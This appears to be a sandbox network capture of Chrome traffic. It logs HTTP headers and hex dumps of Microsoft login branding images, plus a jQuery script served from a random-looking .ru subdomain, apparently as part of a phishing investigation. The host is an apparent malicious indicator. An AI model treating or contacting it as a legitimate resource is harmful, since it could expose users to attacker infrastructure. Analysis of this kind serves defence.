                                                                                                                                                                                    Data Ascii: 467,0,0,0-.592,2.223V18.4H60.525V8.507h2.329v1.559h.038A2.729,2.729,0,0,1,63.855,8.8,2.611,2.611,0,0,1,65.4,8.343m1,5.254A5.358,5.358,0,0,1,67.792,9.71a5.1,5.1,0,0,1,3.85-1.434,4.742,4.742,0,0,1,3.623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.
                                                                                                                                                                                    2024-01-26 13:41:55 UTC1223INData Raw: 2e 33 2c 33 2e 37 32 39 2c 35 2e 32 35 39 2c 35 2e 32 35 39 2c 30 2c 30 2c 31 2d 31 2e 33 38 36 2c 33 2e 38 33 2c 35 2e 30 32 2c 35 2e 30 32 2c 30 2c 30 2c 31 2d 33 2e 37 37 33 2c 31 2e 34 32 34 2c 34 2e 39 33 34 2c 34 2e 39 33 34 2c 30 2c 30 2c 31 2d 33 2e 36 35 32 2d 31 2e 33 35 32 41 34 2e 39 38 37 2c 34 2e 39 38 37 2c 30 2c 30 2c 31 2c 38 35 2e 32 37 38 2c 31 33 2e 36 6d 32 2e 34 32 35 2d 2e 30 37 37 61 33 2e 35 33 37 2c 33 2e 35 33 37 2c 30 2c 30 2c 30 2c 2e 37 2c 32 2e 33 36 38 2c 32 2e 35 30 36 2c 32 2e 35 30 36 2c 30 2c 30 2c 30 2c 32 2e 30 31 31 2e 38 31 38 2c 32 2e 33 34 35 2c 32 2e 33 34 35 2c 30 2c 30 2c 30 2c 31 2e 39 33 34 2d 2e 38 31 38 2c 33 2e 37 38 33 2c 33 2e 37 38 33 2c 30 2c 30 2c 30 2c 2e 36 36 34 2d 32 2e 34 32 35 2c 33 2e 36 35 31
                                                                                                                                                                                    Data Ascii: .3,3.729,5.259,5.259,0,0,1-1.386,3.83,5.02,5.02,0,0,1-3.773,1.424,4.934,4.934,0,0,1-3.652-1.352A4.987,4.987,0,0,1,85.278,13.6m2.425-.077a3.537,3.537,0,0,0,.7,2.368,2.506,2.506,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651
                                                                                                                                                                                    2024-01-26 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    55192.168.2.1649796152.195.19.974436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:56 UTC454OUTGET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/bannerlogo?ts=636973066507737181 HTTP/1.1
                                                                                                                                                                                    Host: aadcdn.msauthimages.net
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:56 UTC688INHTTP/1.1 200 OK
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                    Content-MD5: ovPnmA+85tTVrd3pieQrUQ==
                                                                                                                                                                                    Content-Type: image/*
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Etag: 0x8D6FBA110C925ED
                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2019 08:17:30 GMT
                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                    x-ms-request-id: cee2b3a8-901e-0028-315d-505b8d000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    Content-Length: 3779
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:41:56 UTC3779INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 23 00 c3 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 08 05 06 07 04 01 02 03 ff c4 00 46 10 00 01 03 03 04 00 03 04 05 07 06 0f 00 00 00 00 01 02 03 04 05 06 11 00 07 12 21 08 13 31 22 32 41 51 14 15 61 71 81 16 17 33 52
                                                                                                                                                                                    Data Ascii: JFIF,,C!"$"$C#"F!1"2AQaq3R


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    56192.168.2.1649795152.195.19.974436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:56 UTC456OUTGET /c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/illustration?ts=636978479848606228 HTTP/1.1
                                                                                                                                                                                    Host: aadcdn.msauthimages.net
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:56 UTC690INHTTP/1.1 200 OK
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                    Content-MD5: 6Biw5Vx6HYxPQErt0rREAQ==
                                                                                                                                                                                    Content-Type: image/*
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:55 GMT
                                                                                                                                                                                    Etag: 0x8D7008D750EA59B
                                                                                                                                                                                    Last-Modified: Thu, 04 Jul 2019 14:39:45 GMT
                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                    x-ms-request-id: bd572892-701e-0066-5d5d-509e68000000
                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                    Content-Length: 135326
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:41:56 UTC16383INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 05 04 04 04 04 03 05 04 04 04 06 05 05 06 08 0d 08 08 07 07 08 10 0b 0c 09 0d 13 10 14 13 12 10 12 12 14 17 1d 19 14 16 1c 16 12 12 1a 23 1a 1c 1e 1f 21 21 21 14 19 24 27 24 20 26 1d 20 21 20 ff db 00 43 01 05 06 06 08 07 08 0f 08 08 0f 20 15 12 15 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 ff c0 00 11 08 04 37 03 65 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 08 09 ff c4 00 4c 10 00 01 03 03 02 04 04 03 05 05 07 03 03 03 00 0b 01 00 02 03 04 05 11 12 21 06 31 41 51 07 13 22 61 14 71 81 32 42 91 a1 b1 15
                                                                                                                                                                                    Data Ascii: JFIF,,C#!!!$'$ & ! C 7e"L!1AQ"aq2B
                                                                                                                                                                                    2024-01-26 13:41:56 UTC16383INData Raw: 9e 1f c2 1c 05 05 b4 f7 04 67 f3 5a 7d 0d 3b ab 2e 34 f4 6c 27 33 48 18 08 df 19 5b dd 2f 87 51 4a 5c d9 2e 0f 6b db 11 97 0e 66 36 e8 16 08 eb 35 36 70 9b c7 e2 7d 95 fe 1d a1 d3 4b fd 47 8c fd 8c 66 d0 f0 1c 40 06 50 db d9 a7 70 1b 1a a8 3f 82 23 0e 2d a1 a1 27 b8 a7 1b fe 4b 32 1f 0f a9 0d 23 a5 75 54 af 1a 9a d0 5b a7 6c 8f 9a b7 6f e0 ab 7c f0 d6 3e e0 f9 62 31 cc 59 16 1e 00 0d 1d 4e e9 e6 5e df 3f dc a9 55 e1 eb 2d 37 c7 d8 c3 fd a1 c1 e3 41 14 54 a0 b7 ec e2 98 6d f9 2c 4b 95 3f 03 de a3 7f c5 59 44 c4 0c 79 b0 45 e5 bb e8 42 92 bb 58 b8 56 dc 2a 83 2a 5f 31 8a 0d 6c 22 40 41 7e 71 85 a4 43 3c b1 30 b6 39 88 6b b9 80 72 a8 95 f7 41 f0 cb e3 e1 7a 1d 64 1e 61 95 f7 47 31 f1 0f 84 e8 2c c4 56 d9 6a 6a 25 a5 91 da 0c 55 0d 1a a3 27 b1 1c d7 41 e1 81
                                                                                                                                                                                    Data Ascii: gZ};.4l'3H[/QJ\.kf656p}KGf@Pp?#-'K2#uT[lo|>b1YN^?U-7ATm,K?YDyEBXV**_1l"@A~qC<09krAzdaG1,Vjj%U'A
                                                                                                                                                                                    2024-01-26 13:41:56 UTC16383INData Raw: d4 12 47 69 75 da 9f cc 3a 8c 31 ba 40 0b 5a 06 74 ff 00 e2 3f 25 6b 8b 7d 11 c9 c3 f8 8b 86 ea 4f 19 dc af 90 d5 b1 91 cc ea 87 31 b0 e0 c4 24 8d ad 32 0e e7 72 fe 9c c2 a2 f5 55 f1 16 9b 3d 9a 6a 37 d0 d4 5b e3 7b 1e 5f be a6 12 1c 3d ce c1 74 5b c0 e1 eb 85 96 98 53 4d 15 ae 78 6a cd 40 8d de b6 89 5c e2 e7 07 8d c6 fb 9c 7b ad 07 89 ab e9 ee b7 c8 9d 38 34 94 d1 87 30 39 a7 d4 1a 36 07 1f 5e 5d 97 b9 a7 b2 53 da a4 ba 3c 5d 4c 54 72 d3 ec 8f be 5d e7 a3 b5 c9 c2 d4 b5 31 55 51 92 d7 ba 4d 1e b2 ee 64 12 7d fa 8f ea b4 3a b6 f9 50 39 c4 61 6c 35 92 c9 3d 5b e4 9e a0 d4 38 7a 04 87 ef 01 b0 fc b0 b5 6b fc da 48 84 75 dd 7b 1a 78 28 f0 8f 1f 51 63 97 2c d6 ea 9d a9 ee eb 92 b1 06 ca b9 0e 5e 55 03 dc 2d a4 62 92 48 f5 91 3e a2 78 e1 89 b9 92 47 06 b4 0e
                                                                                                                                                                                    Data Ascii: Giu:1@Zt?%k}O1$2rU=j7[{_=t[SMxj@\{84096^]S<]LTr]1UQMd}:P9al5=[8zkHu{x(Qc,^U-bH>xG
                                                                                                                                                                                    2024-01-26 13:41:56 UTC15713INData Raw: 00 38 dd 5f 06 51 34 6c dc 29 50 62 bc f9 47 66 cb 19 6f d4 6f fd 56 fc 17 30 b7 4c 69 ee 74 d3 13 f6 24 69 3f 23 b1 fc 8a e9 e3 b2 f5 f4 ef 31 c1 e1 ea e3 89 e4 f5 11 16 93 20 44 44 01 11 10 05 43 9a d7 81 a8 02 01 c8 55 a2 00 bc 3f 64 aa 01 7f 98 41 6f a7 6c 1c ab 87 92 03 57 8e 87 ce e1 53 4c ff 00 5c 94 f2 3c 34 bc 00 0e 87 9c 72 24 72 1f d5 62 4d 25 55 34 b7 3b 83 9d 24 b4 d5 33 c4 f8 5f 09 00 68 0d 60 d3 9e a0 e4 90 56 74 d7 56 d2 5d ea 28 24 0c 8d b8 6c ad 18 20 b8 3d c1 a4 8d b7 c3 8e ff 00 30 ac 5e cb 28 38 4e 3d 0e fd d4 2f 8d 98 76 49 90 17 00 1a 4b 79 12 48 df f1 57 c7 39 59 f5 2b 78 32 f8 65 b2 fe cf 6c b5 1a c4 ef 8a 2f 31 a4 9d bd 1b 6c 79 1c 73 5e f1 6d d2 a6 d1 c2 d5 d5 d4 50 3e 7a 96 47 88 d8 c6 6b 39 27 19 c7 61 9c 9f 92 c3 e0 79 22 9f
                                                                                                                                                                                    Data Ascii: 8_Q4l)PbGfooV0Lit$i?#1 DDCU?dAolWSL\<4r$rbM%U4;$3_h`VtV]($l =0^(8N=/vIKyHW9Y+x2el/1lys^mP>zGk9'ay"
                                                                                                                                                                                    2024-01-26 13:41:56 UTC16383INData Raw: db 4e 20 87 48 c3 88 eb ec b1 e8 ad 8d 6c 5f 1b 71 cc 50 37 76 b7 ef 3f e6 a8 ac ba 49 52 f6 b2 26 96 44 dd 9b 18 0b 24 ee 9c de 20 7a 50 d1 d5 52 cc 91 99 5f 50 2a 07 92 c7 10 ce e7 99 2a c3 20 90 5b 9e 61 8f 73 9d 24 77 52 16 bb 04 b2 b7 e2 6a f2 c6 11 90 ce aa 52 bb ca 83 cb a6 63 03 59 13 73 80 39 92 bc db ee e5 42 3c 96 aa 97 6f 83 53 b6 5b e4 8f 5b 1e 4c 98 1a 88 76 fb ad ae d7 41 4f 04 cd 73 8e 87 1d f4 e3 62 b0 e1 02 28 5e e7 39 ad 1d 4f 75 91 1d 44 f3 4c c1 4e d1 8f e3 77 4f a2 cb 75 b9 e0 9c 22 97 24 cd 4d 4c 54 cc 05 d2 31 99 ef cd 46 4d 2c f5 2d 76 96 b9 ad ee e0 ab 8e 88 fc 4f 9b 29 32 3f 3f e2 3f 9f fb 2b d2 3d c4 16 e3 aa c7 b7 8c 16 e7 26 0c 50 18 bd 58 d4 e3 d4 af 64 7f 33 c8 fe 8b 24 b3 d1 ea 3b 2c 19 dc d6 83 fc 94 a3 14 81 87 51 21 24
                                                                                                                                                                                    Data Ascii: N Hl_qP7v?IR&D$ zPR_P** [as$wRjRcYs9B<oS[[LvAOsb(^9OuDLNwOu"$MLT1FM,-vO)2???+=&PXd3$;,Q!$
                                                                                                                                                                                    2024-01-26 13:41:56 UTC16383INData Raw: dd 6c 6b 0b 83 5d cb 20 2d 11 b4 ed 64 51 c8 e6 e5 ee 39 c7 65 be 3e a6 8c 52 48 0d 5c 4e 1a 77 1a b9 ad 3e 79 69 c3 8b 9d 3c 4d 6f fa 97 9d 6b 5b d3 3d 7d 2c 5e d6 8c 58 e9 e2 6b d8 fc 6c 5c 1d 9e a7 75 d0 29 a1 d6 d6 d5 6c ed 7b b4 8e 4b 4b 8d f4 52 7a df 55 10 e8 06 ae 4a 6e 8a ff 00 1d 15 30 a7 86 56 bc 7d dd 4c 2e c1 54 42 e5 5b 7f 72 3a dd 13 d4 c5 63 b4 6d 91 c2 5d 80 47 35 21 04 20 37 61 b0 51 34 97 fb 4c f4 e1 d2 49 2c 33 01 bb 0c 4e 00 9f 6d 95 f8 b8 b2 c6 1e d8 43 aa 0c 8e 38 0d 10 3b 73 f3 c2 bb cc 52 5d 9e 47 c2 b8 3d b2 44 bb 0e 89 dc 1a dd da 70 0a cc 6b 99 e8 63 c0 06 43 81 95 aa cd c4 d2 9a 27 d6 db 6c 75 d5 6d 7b 9c 01 f2 f4 8c 8e 7e eb ca 0b bf 10 5c 70 c9 78 6e 46 96 e3 d4 e9 03 5b bf 7f 97 35 e7 3b 11 eb 55 a7 cb e7 a3 32 e9 65 71 e2
                                                                                                                                                                                    Data Ascii: lk] -dQ9e>RH\Nw>yi<Mok[=},^Xkl\u)l{KKRzUJn0V}L.TB[r:cm]G5! 7aQ4LI,3NmC8;sR]G=DpkcC'lum{~\pxnF[5;U2eq
                                                                                                                                                                                    2024-01-26 13:41:56 UTC16383INData Raw: 8d 36 b8 5a fe e6 88 d7 bb d0 80 b7 5d 6d 10 d8 67 b6 5c 68 64 99 af 7e b6 ba 27 60 f2 ea 54 0b a4 80 89 74 d3 33 49 76 c5 c4 97 34 74 0b 3a 1a 56 be 4f 2d cd cb 46 f9 fe 4a 65 94 5c 39 1d 2f 98 e8 ea 9d 54 72 0c 60 8d 03 b1 ca db be 10 6d ac f2 77 c9 79 5c 1a b4 73 e9 cb 34 73 59 11 55 cb ea 05 ce 6b 4f 23 95 2c 29 6d ae 38 6c 45 87 dc 9e 6a c4 b4 70 c6 f2 06 08 e8 bb e6 c5 f1 82 c5 a6 c9 8f 18 d2 43 9c 33 9d d6 53 24 2e 73 8b 01 68 ce 40 ea a8 c0 d1 a7 1f 22 ae 53 b0 64 f2 c6 39 15 09 63 b2 0b 4c f2 5f 85 cc 7c 63 27 07 9e 02 bc cc 67 4e 33 9e a5 5a 82 26 92 1b 9c 15 29 0d b9 ef 66 bc 1c 60 10 7b ac f3 e1 95 ba 71 d9 6a 2d 03 1b 1c f7 ca d8 68 ad fe 63 7c c2 fc 05 62 96 cb 3c b8 79 89 e7 49 03 d2 dc 83 d9 4c 41 47 34 00 c4 e6 96 96 bb 53 95 b0 84 fb c7
                                                                                                                                                                                    Data Ascii: 6Z]mg\hd~'`Tt3Iv4t:VO-FJe\9/Tr`mwy\s4sYUkO#,)m8lEjpC3S$.sh@"Sd9cL_|c'gN3Z&)f`{qj-hc|b<yILAG4S
                                                                                                                                                                                    2024-01-26 13:41:56 UTC6INData Raw: 1a e8 83 a9 44 61
                                                                                                                                                                                    Data Ascii: Da
                                                                                                                                                                                    2024-01-26 13:41:56 UTC16383INData Raw: 95 52 ca 1e d2 c8 9e 46 5c d7 9c 34 90 74 93 83 9d 88 50 bf 0d c1 ae a7 be d9 ef 97 de 1b 92 cf 57 4c c6 52 d4 c3 58 7e 21 b2 07 b8 92 fd c9 04 00 d2 34 e3 75 c2 ea e4 a8 9f 2e 96 59 65 71 39 cc 8e 2e df be ea 32 40 d6 9d f4 83 ee b3 c3 5d 2c 62 2b 08 f4 27 e0 71 dd ba c9 b6 ce 81 78 e1 bf 0c e2 aa be 57 55 71 3c 35 8c 2c 2d b6 c1 45 2c d2 c9 2b b9 ea 99 ce 1b 0c e7 6e 78 39 25 5e 6f 89 b1 d1 70 b5 35 15 30 a8 aa ba 53 d2 32 96 2a 87 44 c6 45 18 6b 74 8d 2d c9 38 00 9c 67 db 2b 99 3a 58 86 c6 56 7f ee 56 8d 4d 33 76 13 37 3e db a9 fc 5d ed 62 3c 22 51 f0 dd 1d 4d 39 bc bf bb 33 e8 aa e8 a9 4b cd 55 96 9a e3 9f b0 27 7b c0 67 fe c2 32 b2 2a af 62 a2 df 25 1c 56 3b 4d 13 1e 47 ae 9e 98 89 06 0f 20 f7 38 95 0a 6b 20 1c 9c 48 f9 15 43 aa e1 73 5c cc bf d4 08
                                                                                                                                                                                    Data Ascii: RF\4tPWLRX~!4u.Yeq9.2@],b+'qxWUq<5,-E,+nx9%^op50S2*DEkt-8g+:XVVM3v7>]b<"QM93KU'{g2*b%V;MG 8k HCs\
                                                                                                                                                                                    2024-01-26 13:41:56 UTC4926INData Raw: 8c f0 41 43 58 ef 10 ea 22 a4 a5 88 cb 4f f1 15 52 06 c7 2b 7e eb c3 3e f9 c7 40 b3 51 44 69 4d 26 de 5e 79 35 6a 35 0e e6 9b 49 61 63 83 a3 db 2d d6 ba 6b 54 31 5a a9 e0 a5 a0 20 3e 36 c1 b8 78 23 67 13 d7 3d d4 27 18 78 83 c2 5c 05 6f 33 5f 6e 31 c3 2b 87 ee a9 63 f5 cd 31 ec 18 37 df b9 5f 3c 5f 7c 7f 36 9b 14 7c 2f e1 bc 33 3a 9e 9d a6 36 dd 6e 03 27 4f ff 00 ab 67 4e 7b 64 2e 25 5b 59 5f 76 b9 4b 73 ba d6 4d 5d 5d 31 cb ea 27 76 a7 bb db d8 7b 0c 05 7a e4 a5 45 fa 9d 2b 8f fc 6d e2 ae 36 f3 28 28 33 62 b3 97 6d 1c 2f fd fc 80 7f 13 c7 2f fc 57 31 6b 08 cf 52 77 24 9c e4 f5 24 f5 2a a6 b3 b8 57 db 19 e7 85 3c 12 5c 16 da c3 90 b2 e3 8f 3d 17 b1 c5 9c 2c d8 a2 1d 94 8e 1e c3 16 16 7c 51 f2 54 c7 1f 55 97 1c 7c 90 89 72 26 63 a2 ca 68 c0 54 46 dc 05 79
                                                                                                                                                                                    Data Ascii: ACX"OR+~>@QDiM&^y5j5Iac-kT1Z >6x#g='x\o3_n1+c17_<_|6|/3:6n'OgN{d.%[Y_vKsM]]1'v{zE+m6((3bm//W1kRw$$*W<\=,|QTU|r&chTFy


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    57192.168.2.1649799104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:56 UTC770OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6X8VIE8xj/7PshMcgyswItA HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:57 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:57 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OT%2BgGc7WFPgQSl%2FTm1zM73jZsdujkDGPKRfCrGtaFGrkpuukzlQPfUhyNTBn6byzVBsP1inT2Xf3QAgfM7uFSteY7B9vVXKgZwo0nqUlQkpH9Z3b28lurxCFI81oZR%2Fo4eekgf3%2F%2BX6GAQG3tLTaOjgKA4M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d26fed1674a-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:57 UTC629INData Raw: 33 64 35 32 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22
                                                                                                                                                                                    Data Ascii: 3d52/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 74 3d 3d 3d 74 2e 77 69 6e 64 6f 77 7d 2c 76 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 6f 3d 28 74 3d 74 7c 7c 72 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 6e 29 66 6f 72 28 69 20 69 6e 20 76 29 6e 5b 69 5d 26 26 28 6f 5b 69 5d 3d 6e 5b 69 5d 29 3b 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74
                                                                                                                                                                                    Data Ascii: t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object
                                                                                                                                                                                    2024-01-26 13:41:57 UTC1369INData Raw: 72 28 74 20 69 6e 20 65 29 6e 3d 61 5b 74 5d 2c 61 21 3d 3d 28 72 3d 65 5b 74 5d 29 26 26 28 6c 26 26 72 26 26 28 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 72 29 7c 7c 28 69 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 29 29 3f 28 69 3f 28 69 3d 21 31 2c 6f 3d 6e 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 3a 5b 5d 29 3a 6f 3d 6e 26 26 77 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 6e 29 3f 6e 3a 7b 7d 2c 61 5b 74 5d 3d 77 2e 65 78 74 65 6e 64 28 6c 2c 6f 2c 72 29 29 3a 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 61 5b 74 5d 3d 72 29 29 3b 72 65 74 75 72 6e 20 61 7d 2c 77 2e 65 78 74 65 6e 64 28 7b 65 78 70 61 6e 64 6f 3a 22 6a 51 75 65 72 79 22 2b 28 22 33 2e 33 2e 31 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c
                                                                                                                                                                                    Data Ascii: r(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).repl
